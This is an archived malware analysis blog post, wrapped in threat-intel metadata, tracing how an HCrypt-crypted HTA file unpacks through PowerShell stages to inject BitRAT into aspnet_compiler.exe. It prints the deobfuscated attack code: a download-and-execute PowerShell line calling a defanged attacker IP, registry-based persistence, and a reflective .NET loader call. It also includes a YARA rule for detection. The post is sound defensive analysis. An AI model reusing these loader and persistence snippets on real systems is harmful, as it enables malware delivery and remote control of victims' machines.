{ "id": "e37b9513-0b2f-40a8-88e9-7de076aa1aeb", "created_at": "2026-04-06T00:15:53.391494Z", "updated_at": "2026-04-10T13:11:36.548953Z", "deleted_at": null, "sha1_hash": "7581bfd7aedc2c376df4b8cd9ad045bad802c65b", "title": "HCrypt Injecting BitRAT using PowerShell, HTAs, and .NET", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 115122, "plain_text": "HCrypt Injecting BitRAT using PowerShell, HTAs, and .NET\r\nPublished: 2022-01-23 · Archived: 2026-04-05 17:36:57 UTC\r\nOne of my colleagues made a statement recently about how commonplace process injection has become among malware, to\r\nthe point where it seems adversaries don’t have to think about the injection techniques anymore. This is absolutely true as\r\nmany adversaries deploying malware have begun using crypters like HCrypt or Snip3 that inject their arbitrary payloads into\r\nother arbitrary processes. In this post I’m going to walk though analyzing a malware payload protected using HCrypt and\r\ninjected into aspnet_compiler.exe . If you want to play along at home, the sample is available in MalwareBazaar here:\r\nhttps://bazaar.abuse.ch/sample/f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3/\r\nWait, Isn’t Injection Complicated??\r\nEh, process injection can be extremely technical and complicated depending on how deeply you want to understand process\r\ninternals. If you’re simply looking to use process injection, there are multiple free and paid tools that will help you inject an\r\narbitrary array of bytes into an arbitrary process’s memory. In some of the paid products, all an adversary needs to do is\r\ncheck a box. In the case of free tools, sometimes a little bit of coding is needed.\r\nTriaging PS1.hta and Decoding (Stage 01)\r\nMalwareBazaar says the sample is a HTA file, but we should still approach with caution using file .\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\nremnux@remnux:~/cases/bitrat$ file PS1.hta\r\nPS1.hta: HTML document, ASCII text, with very long lines, with no line terminators\r\nremnux@remnux:~/cases/bitrat$ xxd PS1.hta | head\r\n00000000: 3c73 6372 6970 7420 6c61 6e67 7561 6765 \u003cscript language\r\n00000010: 3d6a 6176 6173 6372 6970 743e 646f 6375 =javascript\u003edocu\r\n00000020: 6d65 6e74 2e77 7269 7465 2875 6e65 7363 ment.write(unesc\r\n00000030: 6170 6528 2725 3343 7363 7269 7074 2532 ape('%3Cscript%2\r\n00000040: 306c 616e 6775 6167 6525 3344 2532 3256 0language%3D%22V\r\n00000050: 4253 6372 6970 7425 3232 2533 4525 3041 BScript%22%3E%0A\r\n00000060: 4675 6e63 7469 6f6e 2532 3076 6172 5f66 Function%20var_f\r\n00000070: 756e 6325 3238 2532 3925 3041 4842 2532 unc%28%29%0AHB%2\r\n00000080: 3025 3344 2532 3072 6570 6c61 6365 2532 0%3D%20replace%2\r\n00000090: 3825 3232 706f 7725 3238 2d5f 2d25 3239 8%22pow%28-_-%29\r\nAlright, it looks like we have a HTA file! The file magic corresponded with HTML document thanks to the script tags\r\non the inside. We can even sample the contents with xxd | head to see the strings correspond to script tags containing\r\nJavaScript. The JavaScript inside contains document.write() and unescape() function calls. This means the actual\r\ncontents of the HTA file are a bit obfuscated using URL encoding and will be deobfuscated and written into an HTML\r\ndocument in memory at the time of rendering. To get further we need to deobfuscate the code ourselves safely.\r\n1 \u003cscript language=javascript\u003edocument.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20...self.close%0A%3\r\nThankfully we can use a little bit of NodeJS to deobfuscate the code ourselves! Using the little bit of code below, we can\r\nwrite the deobfuscated HTA content into stage02.hta . If you want to see this approach used more, consider making a stop\r\nby this post where I decode a web shell using the same method.\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 1 of 7\n\n1\r\n2\r\n3\r\n4\r\n5\r\nfs = require('fs')\r\npage = unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20...self.close%0A%3C/script%3E')\r\nfs.writeFileSync('stage02.hta',page)\r\nDecoding PowerShell From Stage 02\r\nNow let’s dive into stage02.hta ! The HTA contains VBScript code within the HTA script tags. There’s quite a bit of string\r\nobfuscation going on here as well. First, we can tell from looking at the HB variable we’re likely looking into a PowerShell\r\ncommand, and the URL in HBB already shows that the sample downloads additional content. The easy hypothesis here is\r\nthat PowerShell will likely download content from this URL and execute it. To confirm/disprove the hypothesis we need to\r\nremove the string obfuscation. Part of the deobfuscation is really easy using find/replace functionality in a code editor of\r\nyour choice. The last bit of obfuscation requires a bit more work with your eyes. The {2}{0}{1} -f chunks of PowerShell\r\ncode correspond with PowerShell Format strings. This feature lets the developer have variable “holding spots” in the middle\r\nof a string and specify the contents of the variable after the rest of the string is defined. To deobfuscate this part, just treat the\r\nstrings after -f like an array, and join them together in the proper order.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n\u003cscript language=\"VBScript\"\u003e\r\nFunction var_func()\r\nHB = replace(\"pow(-_-)rsh(-_-)ll \",\"(-_-)\",\"e\")\r\nHBB = \"$@@@x = 'hxxp://135.148.74[.]241/PS1_B.txt';$@@@$$$=('{2}{0}{1}' -f'---------l---------888---------Nguyễn Văn Tí------\r\nHBB = replace(HBB,\"777\",\"e\")\r\nHBB = replace(HBB,\"888\",\"o\")\r\nHBB = replace(HBB,\"666\",\"c\")\r\nHBB = replace(HBB,\"+++\",\"s\")\r\nHBB = replace(HBB,\"$$$\",\"B\")\r\nHBB = replace(HBB,\"@@@\",\"H\")\r\nHBB = replace(HBB,\"Nguyễn Văn Tèo\",\"P\")\r\nHBB = replace(HBB,\"Nguyễn Văn Tí\",\"a\")\r\nHBB = replace(HBB,\"Nguyễn Văn Tủn\",\".\")\r\nset HBBB = GetObject(replace(\"new:F935DC22-1CF(-_-)-11D(-_-)-ADB9-(-_-)(-_-)C(-_-)4FD58A(-_-)B\",\"(-_-)\",\"0\"))\r\nExecute(\"HBBB.Run HB+HBB, 0, True\")\r\nEnd Function\r\nvar_func\r\nself.close\r\n\u003c/script\u003e\r\nAfter distilling the PowerShell command it looks like our hypothesis is confirmed! The PowerShell command creates a\r\nNet.WebClient object and calls DownloadString() to retrieve additional content. Then the content is fed into Invoke-Expression . Since this cmdlet is designed to execute additional arbitrary PowerShell commands, we can assume whatever\r\ngets downloaded is also PowerShell. So let’s dig into PS1_B.txt !\r\n1\r\n2\r\n3\r\n4\r\n5\r\n$Hx = 'hxxp://135.148.74[.]241/PS1_B.txt';\r\n$HB=('DownloadString');\r\n$HBB=('Net.WebClient');\r\n$HBBB=('IeX(New-Object $HBB).$HB($Hx)');\r\n$HBBBBB =($HBBB -Join '')|InVoke-exPressioN\r\nDecoding PS1_B.txt PowerShell (Stage 03)\r\nFast-forwarding through the triage of this file, we can see it contains PowerShell code as expected. We can already see some\r\nlow-hanging indicators in the content. C:\\ProgramData\\3814364655181379114711\\3814364655181379114711.HTA is going to\r\ncontain the code specified in $FFF . Just like the first HTA file, the content is obfuscated using URL encoding. I’m going to\r\nwager that’s part of a persistence mechanism. Again, we see a URL and Invoke-Expression . It’s probably a safe bet that\r\nthe URL delivers more PowerShell code. There’s also a hex-encoded string that likely contains PowerShell code. After\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 2 of 7\n\ngetting decoded into $asciiString the code gets executed with iex , an alias for Invoke-Expression . So let’s get that\r\ncleartext string.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n$HHxHH = \"C:\\ProgramData\\3814364655181379114711\"\r\n$HHHxHHH = \"C:\\ProgramData\\3814364655181379114711\"\r\n$hexString = \"5b 73 79 73 74 65 6d 2e 69 6f 2e 64 69 72 65 63 74 6f 72 79 5d 3a 3a 43 72 65 61 74 65 44 69 72 65 63 74 6f 72\r\n$asciiChars = $hexString -split ' ' |ForEach-Object {[char][byte]\"0x$_\"}\r\n$asciiString = $asciiChars -join ''\r\niex $asciiString\r\nstart-sleep -s 3\r\n$FFF = @'\r\n\u003cscript language=javascript\u003edocument.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0A\r\n'@\r\nSet-Content -Path C:\\ProgramData\\3814364655181379114711\\3814364655181379114711.HTA -Value $FFF\r\nstart-sleep -s 3\r\n$Hx = 'hxxp://135.148.74[.]241/S_B.txt';\r\n$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'...'')|InVokE-ExpresSioN\r\nAfter decoding using a PowerShell console, we have the cleartext below. Sure enough, the sample contains code to create a\r\npersistence mechanism in a Windows Registry key. The value of that key leads to the HTA dropped on disk.\r\n1\r\n2\r\n3\r\n[system.io.directory]::CreateDirectory($HHxHH)\r\nstart-sleep -s 5\r\nSet-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" -Name \"Startup\" -Value $\r\nNow that we know what this stage does, let’s move forward to look into S_B.txt !\r\nDecoding S_B.txt PowerShell (Stage 04/Last Stop)\r\nIn this stage we can immediately see two really large hex-encoded strings that I truncated here to keep the post manageable.\r\nThe variables $HH1 and $H4 contain two hex strings that likely decode to Windows EXE files. We can immediately tell\r\nthis because the strings start with 4D5A , which translates from hex into the traditional MZ magic bytes for Windows EXE\r\nfiles. Further down, the adversary has a VIP() function that decodes text from base64 strings. Finally, there’s some base64\r\ncode at the bottom of the script that has some string obfuscation inside that gets replaced/removed during runtime. If we do\r\nthe replacement ourselves using find/replace we can have some legible base64 text to decode.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n$HH1 = '4D5A9::::3 ... ::::::::::::::::::::::'.Replace(\":\",\"0\")\r\n[String]$H4='4D5A9::::3 ... :::::'.Replace(\":\",\"0\")\r\nFUNCTION VIP($9467422421889788552276)\r\n{\r\n $8398517835117813353988 = \"Get1859655144789612381153ng\".Replace(\"1859655144789612381153\",\"Stri\");\r\n $4699715146936475627384 = [Text.Encoding];$7899832798818496373215 = \"U76241165786257964469388\".Replace(\"76241165786257964\r\n $5654519196338572648864 = \"Fr\"+\"omBa\"+\"se6\"+\"4Str\"+\"ing\"\r\n $1436688125918197238672 = $4699715146936475627384::$7899832798818496373215.$8398517835117813353988([Convert]::$565451919\r\n return $1436688125918197238672\r\n}\r\n$AAAAASXXX = '5961151185971873545969W15961151185971 ... 185971873545969nKXx5961151185971873545969JYEV5961151185971873545969gW\r\n$AAAAASXXXX = VIP($AAAAASXXX);\r\nIEX $AAAAASXXXX\r\nAnd after decoding the text ourselves, we have the chunk of code below! This chunk of code takes the hex-encoded strings\r\nand converts them into byte arrays. This is significant for a couple reasons in malware analysis. First, if the adversary simply\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 3 of 7\n\nwanted to execute the malware, they could run Start-Process or call the EXE manually. Holding the binaries as byte\r\narrays means they’re planning to use them programmatically in PowerShell or .NET code, usually with some form of\r\ninjection or reflective loading. Sure enough, at the end of the script contents we can see [Reflection.Assembly]::Load() .\r\nThis call loads the contents of the $H5 binary into memory for use. These contents are likely a .NET DLL. The rest of the\r\ncode calls the function HHH() from the class HH.HH in that loaded DLL, providing the input string containing\r\naspnet_compiler.exe and the byte array $H6 which likely contains a payload the adversary intends to inject into\r\naspnet_compiler.exe . I’ll cover this a bit more at the end of the post, but this style of payload delivery is incredibly\r\ncommon among modern crypters that adversaries use to shield their payloads. For the threat intel geeks, take note of the\r\nstring $HBAR in the PowerShell code. This is one indicator we’re looking at HCrypt.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n[String]$H1= $HH1\r\nFunction H2 {\r\n \r\n [CmdletBinding()]\r\n [OutputType([byte[]])]\r\n param(\r\n [Parameter(Mandatory=$true)] [String]$HBAR\r\n )\r\n $H3 = New-Object -TypeName byte[] -ArgumentList ($HBAR.Length / 2)\r\n for ($i = 0; $i -lt $HBAR.Length; $i += 2) {\r\n $H3[$i / 2] = [Convert]::ToByte($HBAR.Substring($i, 2), 16)\r\n }\r\n return [byte[]]$H3\r\n}\r\n[Byte[]]$H5=H2 $H4\r\n[Byte[]]$H6= H2 $H1\r\n$H12 = 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30\\aspnet_compiler.exe'\r\n[Reflection.Assembly]::Load($H5).GetType('HH.HH').GetMethod('HHH').Invoke($null,[object[]](,$H6))\r\nNow let’s get at those binaries!\r\nNot going to lie, I cut some corners here using CyberChef. I used the Find/Replace operation followed by From Hex. Then\r\nwe can save the contents out to disk and examine them.\r\nDecompiling the Injector\r\nAlright, the first binary that I extracted was the .NET injection DLL held in $H5 . The .NET code easily compiled with\r\nilspycmd , but it contained a load of obfuscation. To save some time and space, I’ve gone ahead and included just the\r\nrelevant parts below. The code contains references to kernel32 , LoadLibraryA , and GetProcAddress . These references\r\nmean the code likely imports additional native, non-.NET DLL functions at runtime for its injection operations. We can also\r\nsee the function HHH() , which would be a good breakpoint if we decided to get into debugging this .NET code. For the\r\ncyber threat intelligence geeks out there, there’s a feature in this code to help you pivot and find more samples in VirusTotal!\r\nThe GUID 8c863524-938b-4d92-a507-f7032311c0d0 can be used with VirusTotal Intelligence or Enterprise to find\r\nadditional samples using the search netguid:8c863524-938b-4d92-a507-f7032311c0d0 . To learn more about the GUID, take\r\na look at this post in VirusBulletin: https://www.virusbulletin.com/virusbulletin/2015/06/using-net-guids-help-hunt-malware/\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n[assembly: AssemblyTitle(\"Bit\")]\r\n[assembly: AssemblyDescription(\"\")]\r\n[assembly: AssemblyConfiguration(\"\")]\r\n[assembly: AssemblyCompany(\"\")]\r\n[assembly: AssemblyProduct(\"Bit\")]\r\n[assembly: AssemblyCopyright(\"Copyright © 2021\")]\r\n[assembly: AssemblyTrademark(\"\")]\r\n[assembly: ComVisible(false)]\r\n[assembly: Guid(\"8c863524-938b-4d92-a507-f7032311c0d0\")]\r\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\r\n[assembly: TargetFramework(\".NETFramework,Version=v4.0\", FrameworkDisplayName = \".NET Framework 4\")]\r\n[assembly: AssemblyVersion(\"1.0.0.0\")]\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 4 of 7\n\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\nnamespace HH\r\n{\r\n public static class HH\r\n {\r\n ...\r\n [DllImport(\"kernel32\", EntryPoint = \"LoadLibraryA\", SetLastError = true)]\r\n private static extern IntPtr a([MarshalAs(UnmanagedType.VBByRefStr)] ref string a);\r\n [DllImport(\"kernel32\", CharSet = CharSet.Ansi, EntryPoint = \"GetProcAddress\", ExactSpelling = true, SetLastError = t\r\n private static extern IntPtr b(IntPtr a, [MarshalAs(UnmanagedType.VBByRefStr)] ref string b);\r\n ...\r\n public static bool HHH(string HHHHHHHHHHBBBBBBBBBB, byte[] HHHHHHHHHHHHHHHHHHHHHHHHHHBBBBBBBBBBBBBBBBBBBBBBBBBBBB)\r\n {\r\n int num = 1;\r\n while (!d(HHHHHHHHHHBBBBBBBBBB, HHHHHHHHHHHHHHHHHHHHHHHHHHBBBBBBBBBBBBBBBBBBBBBBBBBBBB))\r\n {\r\n num = checked(num + 1);\r\n if (num \u003e 5)\r\n {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\nFor now, that’s as much as I want to squeeze from the injector. Assuming it does its job of just injecting code, the interesting\r\nstuff will be in the second binary extracted.\r\nIdentifying BitRAT\r\nOnce we extract the second binary and name it payload.bin , we can use file to triage it. The output says the binary was\r\npacked with UPX, and we can unpack the binary using UPX in REMnux! Using upx -d , we can obtain the original\r\npayload. From here we can search VirusTotal for the hashes and import hash, finding that VirusTotal has already seen the\r\nfile and identifies it as malicious.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\nremnux@remnux:~/cases/bitrat$ file payload.bin\r\npayload.bin: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed\r\nremnux@remnux:~/cases/bitrat$ upx -d payload.bin\r\n Ultimate Packer for eXecutables\r\n Copyright (C) 1996 - 2020\r\nUPX 3.96 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Jan 23rd 2020\r\n File size Ratio Format Name\r\n -------------------- ------ ----------- -----------\r\n 3943424 \u003c- 1511424 38.33% win32/pe payload.bin\r\nUnpacked 1 file.\r\nremnux@remnux:~/cases/bitrat$ file payload.bin\r\npayload.bin: PE32 executable (GUI) Intel 80386, for MS Windows\r\nremnux@remnux:~/cases/bitrat$ pehash payload.bin\r\nfile\r\n filepath: payload.bin\r\n md5: e47b1f77a31d1d91625997da66bb1a94\r\n sha1: e29f96b7032e2e8447cd5ae6f8aaf0ac85db8cb9\r\n sha256: 183809b333c8afcea627e845f08f56131ca63fe592498685d93d305207e6c07c\r\n ssdeep: 98304:X77Pmq33rE/JDLPWZADUGer7B6iY74M/rmlwXVZ:f+R/eZADUXR\r\n imphash: 71955ccbbcbb24efa9f89785e7cce225\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 5 of 7\n\nTo get some better attribution on the malware family, we can borrow YARA rules from the ditekshen on GitHub. Using\r\nthe rules at https://github.com/ditekshen/detection/blob/master/yara/malware.yar we can run a YARA scan and identify\r\nBitRAT.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\nremnux@remnux:~/cases/bitrat$ yara -s malware.yar payload.bin\r\nMALWARE_Win_BitRAT payload.bin\r\n0x33abf0:$s1: \\plg\\\r\n0x33ad70:$s3: files_delete\r\n0x3399bc:$s9: ddos_stop\r\n0x33abd0:$s10: socks5_srv_start\r\n0x33adb8:$s16: klg|\r\n0x3399ec:$s17: Slowloris\r\n0x33ac60:$s18: Bot ID:\r\n0x33b198:$t1: \u003csz\u003eN/A\u003c/sz\u003e\r\nThe exact rule it hits on is below:\r\nrule MALWARE_Win_BitRAT {\r\n meta:\r\n author = \"ditekSHen\"\r\n description = \"Detects BitRAT RAT\"\r\n clamav_sig = \"MALWARE.Win.Trojan.BitRAT\"\r\n strings:\r\n $s1 = \"\\\\plg\\\\\" fullword ascii\r\n $s2 = \"klgoff_del\" fullword ascii\r\n $s3 = \"files_delete\" ascii\r\n $s4 = \"files_zip_start\" fullword ascii\r\n $s5 = \"files_exec\" fullword ascii\r\n $s6 = \"drives_get\" fullword ascii\r\n $s7 = \"srv_list\" fullword ascii\r\n $s8 = \"con_list\" fullword ascii\r\n $s9 = \"ddos_stop\" fullword ascii\r\n $s10 = \"socks5_srv_start\" fullword ascii\r\n $s11 = \"/getUpdates?offset=\" fullword ascii\r\n $s12 = \"Action: /dlex\" fullword ascii\r\n $s13 = \"Action: /clsbrw\" fullword ascii\r\n $s14 = \"Action: /usb\" fullword ascii\r\n $s15 = \"/klg\" fullword ascii\r\n $s16 = \"klg|\" fullword ascii\r\n $s17 = \"Slowloris\" fullword ascii\r\n $s18 = \"Bot ID:\" ascii\r\n $t1 = \"\u003csz\u003eN/A\u003c/sz\u003e\" fullword ascii\r\n $t2 = \"\u003csilent\u003eN/A\u003c/silent\u003e\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and (7 of ($s*) or (4 of ($s*) and 1 of ($t*)))\r\n}\r\nNow we’ve identified the payload as BitRAT using YARA from a source that is fairly reputable and used in VirusTotal’s\r\ncrowdsourced rules feature. If you want more details on the malware you can throw it into a sandbox to extract details and\r\nindicators.\r\nInjection is Commonplace Now\r\nLooping back on the subject of injection, I want to reiterate that injection is incredibly common. Crypter products and\r\nservices like HCrypt and Snip3 provide ready-made encryption functionality for adversaries to simply check boxes and\r\nexecute. For injection, these crypters are going to work in a similar method:\r\nDeploy injector -\u003e Spawn process -\u003e Inject byte array into process\r\nThe differences between the crypters are simply the implementation details. For Snip3, I’ve seen samples where the crypter\r\ndelivers its injector component in obfuscated C# code and then compiles it at runtime for injection. In cases like Aggah\r\nmalware threats, I’ve seen more samples that look like HCrypt where we have two binaries encoded in the same script.\r\nInjection isn’t just for fancy stuff anymore, it’s trivial for adversaries to implement.\r\nThanks for reading!\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 6 of 7\n\nSource: https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nhttps://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/" ], "report_names": [ "hcrypt-injecting-bitrat-analysis" ], "threat_actors": [ { "id": "b0d34dd6-ee90-483b-bb6c-441332274160", "created_at": "2022-10-25T16:07:23.296754Z", "updated_at": "2026-04-10T02:00:04.526403Z", "deleted_at": null, "main_name": "Aggah", "aliases": [ "Operation Red Deer", "Operation Roma225" ], "source_name": "ETDA:Aggah", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Aggah", "Atros2.CKPN", "Bladabindi", "Jorik", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "Origin Logger", "Revenge RAT", "RevengeRAT", "Revetrat", "Warzone", "Warzone RAT", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2", "created_at": "2023-06-20T02:02:10.254614Z", "updated_at": "2026-04-10T02:00:03.365336Z", "deleted_at": null, "main_name": "Hagga", "aliases": [ "TH-157", "Aggah" ], "source_name": "MISPGALAXY:Hagga", "tools": [ "Agent Tesla" ], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434553, "ts_updated_at": 1775826696, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7581bfd7aedc2c376df4b8cd9ad045bad802c65b.pdf", "text": "https://archive.orkl.eu/7581bfd7aedc2c376df4b8cd9ad045bad802c65b.txt", "img": "https://archive.orkl.eu/7581bfd7aedc2c376df4b8cd9ad045bad802c65b.jpg" } }